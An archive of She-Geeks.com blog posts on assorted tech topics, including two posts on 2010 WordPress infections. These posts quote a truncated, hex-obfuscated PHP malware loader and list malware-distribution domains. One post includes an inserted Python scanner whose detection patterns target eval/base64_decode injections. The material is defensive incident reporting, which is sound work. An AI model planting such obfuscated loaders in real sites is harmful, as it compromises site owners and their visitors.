Jan 09 2016

:: justy ::

contact :: J ::

Justy, my She-Geeks.com partner, co-creator of this collaboration and dear friend, passed away November 2015.  She is very missed both on this site and in our lives.  In an effort to continue to give back, I will be donating a portion of each She-Geeks shop sale to her son, little Landon.

Pick Up Some Geek Gear Today and Show Your Support.  ;)


http://www.cafepress.com/shegeeks


Justy, you are missed…



*Keep an eye out for new geeky posts to come for 2016 as we pump new life into She-Geeks.com in Justy’s memory*


Posted by admin
Oct 31 2010

One of my blogs was hit today (Happy Halloween) by this new strain of WordPress Blog attacks.  The Sucuri Team was able to tackle the infection without issue and has posted some good information on the latest version attacking (at this point) Godaddy servers.  Read more below:

“Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll. php?k=1

www3.hope-soft57. net
www3.new-protectionsoft23. in
www4.free-pc-protection9. in

http://insomniaboldinfocom.com/mm. php

http://insomniaboldinfonet.com/mm. php

www3.large-defense1. in

All the sites we’ve seen so far have the following code added to all PHP files:

$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY..

Which is basically just the eval(base64_decode encoded. What is interesting is that this site is hosted at 77.78.239.53, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related:

myblindstudioinfoonline. com
meqashoppercom. com
insomniaboldinfocom. com

The following script should clean up any infected site: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Click this link for more info on Sucuri’s Security Services!

Posted by admin
Jun 13 2010

Many of you over the past few months have experienced the onslaught of WordPress attacks which has plagued site owners – and loyal fans, alike.  I maintain multiple WordPress blogs in addition to our beloved She-geeks.com site, as well as my clients’ WordPress blogs.  While refraining from too much detail, I had the unfortunate duty of ridding two such WordPress websites of these WordPress attacks.  While both of the blogs I’m referring to maintained updated software (plugins and core files), they still fell victim to these attacks.  The attacks I am referring to primarily affected PHP pages, which would mean that A LOT of sites out there on the internet had the potential for infection.  The code would essentially insert itself into each PHP page on your site and/or WordPress blog and add strings of code which contained “eval(base64_decode“ in some way, shape or form.  This script is generally found at the very top of the page’s code – I assume so it hits first.

I spent hours upon hours working to isolate the issues and hand-remove the malicious code only to have it reappear a week later.  I ultimately had to bring on the “big dogs” in WordPress blog security, Sucuri.net.  David and the rest of the Sucuri Crew were able to solve all site issues within 30 minutes.  It was a beautiful thing.  You see, although I managed to remove most of the “malicious eval code” during these attacks myself, there appeared to be a snippet of code eluding my capture.  This code, also referred to as a backdoor by many, was hiding in the shadows of unending lines of code.  It’s really too much code to parse through with the naked eye…never mind the fact that manual removal like that is likely not the most efficient method when time (and money) is of the essence.  What can I say, I was stubborn.   Needless to say, the Sucuri Crew was very efficient and truly a life saver on that day.

Below I’ve outlined some of what I found online pertaining to the malicious attacks as well as some portions from my personal experience with the nefarious code.

Some of the malicious strings of code which were present:

“http://holasionweb dot com/oo dot php”

holasion web

There are a few mentions of solutions you can try but, in the end, the only solution which seemed to work in my case was enlisting Sucuri’s help.  However, I’ll list a few better known solutions for this type of WordPress attack:

  1. completely deleting your WordPress install and reinstalling on your hosting account (note: not fun)
  2. logging into your hosting provider and accessing a CLEAN archive version of your website. (note: you’d need to know an archived date on which your blog was completely clean and free of the bad code)
  3. Sucuri offers a free “cleaning” script which you can run yourself and seems to have helped quite a few people resolve their issues
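
To check which PHP files still carry the injected loader after any of these cleanup attempts, the added example below (not Sucuri's cleanup script and not code from the original post) flags both the plain "eval(base64_decode(" form described above and the hex-escaped create_function / base64_decode variant quoted in the Oct 31 2010 post. The function names, the sample strings and the placeholder payload are constructed for illustration.

```python
import os
import re

# Function names the injected loader depends on (named in the post and the quoted sample).
SUSPICIOUS = ("eval", "base64_decode", "create_function")
PLAIN_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # PHP double-quoted string literals
ESCAPE_RE = re.compile(r"\\\\|\\x([0-9a-fA-F]{1,2})|\\([0-7]{1,3})")

def decode_php_escapes(literal):
    """Resolve \\xNN and octal escapes as PHP does inside double quotes."""
    def repl(m):
        if m.group(1) or m.group(2):
            return chr(int(m.group(1) or m.group(2), 16 if m.group(1) else 8) & 0xFF)
        return m.group(0)  # escaped backslash, not a character escape
    return ESCAPE_RE.sub(repl, literal)

def scan_php_source(text):
    """Return a sorted list of reasons this PHP source looks injected."""
    reasons = set()
    if PLAIN_RE.search(text):
        reasons.add("plain eval(base64_decode(")
    for m in STRING_RE.finditer(text):
        raw = m.group(1)
        decoded = decode_php_escapes(raw).lower()
        # Flag only names that were hidden: readable after decoding, not before.
        if decoded != raw.lower() and decoded in SUSPICIOUS:
            reasons.add("escaped function name: " + decoded)
    return sorted(reasons)

def scan_tree(root):
    """Scan every .php file under root; map path -> reasons for flagged files."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="latin-1") as fh:
                    reasons = scan_php_source(fh.read())
                if reasons:
                    hits[path] = reasons
    return hits

def php_hex(name):  # builds constructed test data only
    return "".join("\\x%02x" % ord(c) for c in name)

# Constructed samples, not real infected files; the base64 payload is a placeholder.
PLAIN = '<?php eval(base64_decode("cGxhY2Vob2xkZXI=")); ?><?php get_header(); ?>'
OBFUSCATED = ('<?php $_a="%s";$_b="%s";$_c=$_a("",$_b("cGxhY2Vob2xkZXI=")); ?>'
              % (php_hex("create_function"), php_hex("base64_decode")))
```

Run scan_tree() against the web root before and after cleaning; a file that shows up again a week later, as happened here, points to a backdoor the cleanup missed rather than a fresh infection.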

Additional documented information which may prove useful for others is shown below.  You may see some similarities.  If you’ve collected any additional information or have a similar story to share, we’re all ears.

Xorg malware info

Holasion web info

realsafe malware info

suitecase52 malware info

More information on Sucuri Security:

“Sucuri Security is the leading provider of web-based integrity monitoring and malware detection solutions – delivered as a service. Sucuri solutions are deployed remotely in a matter of minutes anywhere in the world, allowing our customers to immediately detect web-based malware and monitor their internet presence. Sucuri’s web monitoring solution is used today by more than 8,000 sites worldwide. Sucuri was founded in 2008.

In simple terms, we clean up the mess. If your site got hacked, blacklisted or infected with malware, we fix it for you. If your site is clean, we monitor it to let you know if a problem ever happens. We work fast, we are affordable and we get things done.”

Click here to check them out: sucuri security

Posted by admin
May 10 2010

Followers gone – don’t panic   ;0)

Twitter Bug Lost Followers

It appears a bug has popped up on Twitter today.  Apparently this bug “allows users to make anyone follow them“.  I’m sure you can see how this could be a bit of an issue for Twitter and its loyal clan.  Some of the details on this snafu are:  “writing “[tweet] accept [username]” then the [username] immediately starts following you.”

Want to know more, check out some of these sources:

http://www.ibtimes.com/articles/20100310/17-pct-twitter-users-havefollowers.htm

http://eu.techcrunch.com/2010/05/10/does-this-twitter-bug-force-anyone-to-follow-you/

http://mashable.com/2010/05/10/twitter-follow-bug/

Let’s hope those Twitter Follow stats bounce back soon!

:: swytch ::

Posted by admin
Apr 14 2010

While surfing the internet with my “lab rat hat” on, I came across various articles and videos on “How To Build An Oil Cooled PC”.  I thought to myself, OMG seriously?

Apparently, not only do hardware gearheads do this, but they sell these pre-made PCs online.

They also offer DIY computer kits for the adventurous ones out there.


So, you may ask, how is this aberration of nature possible?  Well, mineral oil is non-conductive.  It is actually possible – though potentially mind-bending – to submerge your PC’s shiny parts into mineral oil (cleanest option).  Though I doubt I’ll ever be moved to attempt this myself, I do find it strangely interesting.  :)

Here are a few brief videos on hard-core enthusiasts at work!

:the End :: :: swytch ::

Posted by swytch
Apr 13 2010

4sqday logo

4Square Day 2010 is approaching and the buzz around the social networks is really starting to pick up.  Interestingly, though, it’s not just about “social”.  This morning I noticed tweet after tweet from local businesses offering discounts and deals for the nationwide 4Square event.

If you surf over to their website, you’ll find a listing of the “Top Participating Cities” such as:

(big props to FL & GIT Tampa!   ;P  )

There are also currently some “4square swarm parties” scheduled:

Tampa Bay, FL USA Swarm

Foursquare Day Global Swarm

There are a few other sources for information such as:

Twitter:  http://twitter.com/4sqday

(hashtags: #4SQDay, #4sqday)

Facebook: http://www.facebook.com/FoursquareDay

For more information on the 4Square Day events in your area, visit:  http://4sqday.com/

:: swytch  ::

Posted by admin
Jan 20 2010

01.27.09 by:: swytch

I’m sure many of you have encountered this devilish BSOD (blue screen of death) at least once in your lifetime.

unmountable boot volume

In my line of work, people tend to come to me in utter anguish praying they haven’t lost their files. Most of the time I can get the user up and running again within a short period of time but there are those times…. well, I’ll just re-emphasize the need to BACK UP YOUR DATA. :0)

Here are a few steps which I used to get my laptop back in shape. (The steps below reference Windows XP but can help with troubleshooting other operating systems.)

Step 1 – Located my Windows XP operating system disk. With my XP disk in the CD-rom drive, I powered up the computer. When prompted, I booted to the CD drive and not the internal hard drive. At that point I began to see XP starting its boot and restore process.

boot from windows CD

Step 2 – When prompted, select “R” to repair the current XP installation. You will then be brought to the Windows System Repair prompt shown below.

windows xp setup

Step 3 – I resolved the situation using both the FIXBOOT and FIXMBR commands.

windows fixboot and fixmbr commands

original photo: http://www.windowsnetworking.com

I ran the FIXBOOT command first, then rebooted the machine to see if it solved the problem. It didn’t so I proceeded with the FIXMBR command and tested again.

Step 4 – I returned to the Windows Recovery Console and ran the chkdsk command with a ” /r ” for recover.

chkdsk command

After I completed the steps above, I performed a full shutdown.
I booted the laptop and we were back in action! These are the steps that I took but know that there are many more commands you can use in the Windows Recovery Console.

Check out some of these sources for additional information:

http://support.microsoft.com/kb/297185
http://www.wikihow.com/Use-Windows-Recovery-Console-from-XP-CD
http://commandwindows.com/recovery.htm

Posted by admin
Aug 20 2009

09.10.08 by:: swytch

Many of you, myself included, have run into pretty interesting jpgs or gifs created using pure ASCII text. I have always wondered if there was a free and easy way for me to create my own ASCII text without losing my mind completely and attempting it “by hand”.
Well, when wandering the ether recently I discovered a free program called “pic2ascii”. Information on the program and its creator:

ascii

During my first complete run of this program, I used the following scooter graphic as a target.

Scooter

Scooter

I simply clicked ASCII-Table in the top bar and chose “fill with all possible characters”. This loaded the ASCII information I needed to complete this process. I also saved that table as a text file (option available through the ASCII-Table drop down).
Next I browsed to my target graphic and chose the preferred font for this run.
Click START and wait for the pop-up box stating the process is complete!
Pic2ASCII rendered the following ASCII image relatively quickly.

scooter

The ASCII image the program rendered was quite large so I decided to decrease the size of the target scooter graphic. This rendered a slightly more manageable output. See below.

scooter

Now, being relatively excited about ASCII rendering, I decided to take it up a notch and find a program which would do this in color. I came across the free ZW Text Mosaic program.
Once installed, I decided to demo the program with the same scooter graphic used previously.
Using the same picture but rendering it with ZW Text Mosaic

scooter

scooter

In addition to the color option, you can actually type in text you wish to use during the rendering process. Of course, I used she-geeks.com as my text.
Once the image has been generated, you can choose either Show or Open to view the graphic.
All in all, these programs are straightforward enough that anyone can have a bit of fun using them. Get creative and enjoy! :)

Posted by admin
Feb 06 2008

02.06.08 by swytch

Ok, how many of you out there are completely aggravated with MS Office 2007? I mean some of the UI is nice but I can’t find what I need…and that makes me one angry grrl. The point of this drivel is Outlook email headers. Most of us out there know how to get to the header information in previous versions of Outlook so I won’t go into detail on that. Why would I look at email header information, you say? Who cares, you say? You care. I mean, if you’ve ever gotten SPAM (we know you have) and wanted to know where that pointless piece of electronic waste came from, you look at email headers. With that said, here is the skinny on checking header information in Outlook 2007:

Viewing Full Header Information in MS Outlook 2007

The following information is useful in checking suspicious email messages:

For Outlook 2007:

1. Open Outlook.
2. Open a message.
3. On the Message tab, in the Options group, click the Dialog Box Launcher icon.
4. In the Message Options dialog box, the headers appear in the Internet headers box.

For older versions of Outlook:

1. Open Outlook.
2. Open the message you’d like to view headers for.
3. Click the View menu, and select Options…. The full headers will appear in a new window.

See how simple that was? The rest is up to you. Don’t say I didn’t warn ya!

Posted by admin
Feb 06 2008

02.06.08 by:: swytch

So, you’re on a network (with permission, of course) and suddenly you find you can no longer access a certain file or folder….what to do? Try this little trick:

To adjust, set or regain file/access permissions:

Folder Permissions:

When permissions are lost on a file or folder, Administrator (or yourself) must take ownership of it to recover/adjust to the proper permissions.

Right click on the file in question and select Security.

When prompted with a warning that “you only have rights to view”, click ok.

Click on the Advanced Tab.

Click on the Ownership Tab

To change ownership, select Administrator (or your username) and click OK.

Click OK again to close the window.

Now,

Right-click on that file again and adjust the rights to what they should be.
Ahhh…with any luck on your end, access is yours.

Posted by admin

© 2010-2017 She-Geeks.com All Rights Reserved